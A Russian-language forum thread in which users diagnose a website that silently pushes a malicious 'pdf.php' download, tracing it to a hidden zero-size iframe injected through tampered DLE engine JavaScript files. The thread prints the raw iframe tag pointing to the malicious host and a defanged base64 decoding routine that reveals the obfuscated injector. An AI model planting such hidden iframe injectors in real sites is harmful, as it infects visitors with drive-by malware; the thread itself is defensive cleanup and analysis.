При заходе на сайт ripbox_ru (вернее при первом заходе) если сменить IP то выскочит снова

выскакивает в менеджере загрузок файл и просится счкачать - _http://herewereytinj.com/tera/sv777/pdf.php после скачивания получается файл типа s85LQp3BqohkWX8OXrI2d.pdf (каждый раз другой выходит)

как я понял это разновидность pdf.php вируса

я сообщил админу того сайта... он проверил все шаблоны но вируса не обнаружил
проверка тут http://sitedrill.ru/ripbox.ru показывает что сайт чистый
но всё таки после каждого смена айпи адреса вылазит этот файл на закачку

куда могли спрятать вирус? как определить?

скрытую загрузку можно по-разному сделать, в т.ч. через редирект...
я сообщил админу того сайта... он проверил все шаблоны но вируса не обнаружил »
хехе... за такие загрузки ему мб денюжка капает...

тема перенесена из раздела "Вебмастеру"

AACC, здравствуйте. Выполните рекомендации (http://www.forum.oszone.net/post-717373-2.html) и прикрепите к следующему сообщению полученные логи.

Sham, тот админ к этим загрузкам не причем... он сам попросил меня чтоб я гдето спросил

sanek_freeman, мне не мой компьютор лечить нужно, а тот сайт

мне не мой компьютор лечить нужно, а тот сайт »Зарегистрируйтесь на форуме и оставьте заявку в этой теме - Проверить сайт на наличие вирусов, все просьбы о проверке оставляйте тут (http://www.virusnet.info/forum/showthread.php?t=518)

вверху, где баннер, каким-то скриптом суется iframe
<iframe width="0" height="0" src="http://herewereytinj.com/tera/sv777/index.php"></iframe>
очевидно, в него и подгружается pdf со скриптом (который выполняется очевидно только акробат-ридере).

Рекламные скрипты размещает админ, значит, пусть проверяет все скрипты рекламодателей.

спасибо всем за помощь

сайт от вирусов отчистился... вирус скрывался в JS файлах
в данном случаи они скрывались в папке \engine\ajax
menu.js
js_edit.js
dle_ajax.js

админ перелил на оригенальные файлы и вирус исчез

вопрос как можно было их изменить так чтоб дата редактирования не изменилась?

п.с.

кстати есть для примера 1 файл с вирусом
если хотите могу показать

я его проверил касперским и там оказался вирус

Сейчас скрытый фрейм как и был, никуда не исчез, но src редиректит на 404 (удален из удаленного хоста).

Sham, каким способом ты видишь скрытый фрейм?

FF + noscript (вверху слева квадратик - типа заблокирован фрейм), или через DOM (например, FF + firebug).

Теперь исчез вроде :), видимо у меня в кэше завалялось...

Sham, можешь сделать скриншот в каком месте ты его видел?

в каком месте ты его видел? »
внутри <div class="banner"></div>

Я так думаю, что движок того сайта занулен, и скачан незнамо откуда, со скриптами, уже содержащими левый код. Рынок таких загрузок (вирусов и зловредов) существует, и тот кто убирает защиту у платных CMS/форумов, таким образом может захотеть подзаработать...

вот оказывается в каком файле был спрятан вредоносный код

пароль на архив - virus

я сканировал его разными утилитами... только Kaspersky Virus Removal Tool нашел в нем злой код

п.с.
кто занет как можно расшифровать код в том JS файле

запустите код в HTML-файле - увидите код iframe (код обезопасен заменой тегов)

<script language="javascript" type="text/javascript">

function c7a2e3dfd1(y5){var nc='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var ne='';var qb,re,y3,xa,v0,n9,v7;var yf=0;do{xa=nc.indexOf(y5.charAt(yf++));v0=nc.indexOf(y5.charAt(yf++));n9=nc.indexOf(y5.charAt(yf++)) ;v7=nc.indexOf(y5.charAt(yf++));qb=(xa<<2)|(v0>>4);re=((v0&15)<<4)|(n9>>2);y3=((n9&3)<<6)|v7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;ne+=String.fromCharCode(qb);if(n9!=64){if(re>=192)re+=848;else if(re==168)re=1025;else if(re==184)re=1105;ne+=String.fromCharCode(re);}if(v7!=64){if(y3>=192)y3+=848;else if(y3==168)y3=1025;else if(y3==184)y3=1105;ne+=String.fromCharCode(y3);}}while(yf<y5.length);document.write(ne.replace(/\</g,'&amp;lt;').replace(/\>/g,'&amp;gt;'));};c7a2e3dfd1('PGlmcmFtZSBzcmM9Imh0dHA6Ly9oZXJld2VyZXl0aW5qLmNvbS90ZXJhL3N2Nzc3L2luZGV4LnB ocCIgd2lkdGg9MCBoZWlnaHQ9MD48L2lmcmFtZT4A');

</script>

тут мы видим функцию c7a2e3dfd1() раскодировки, и закодированную строку 'PGlmcmFtZ....', которая после раскодировки будет тегами, вставляемыми с помощью document.write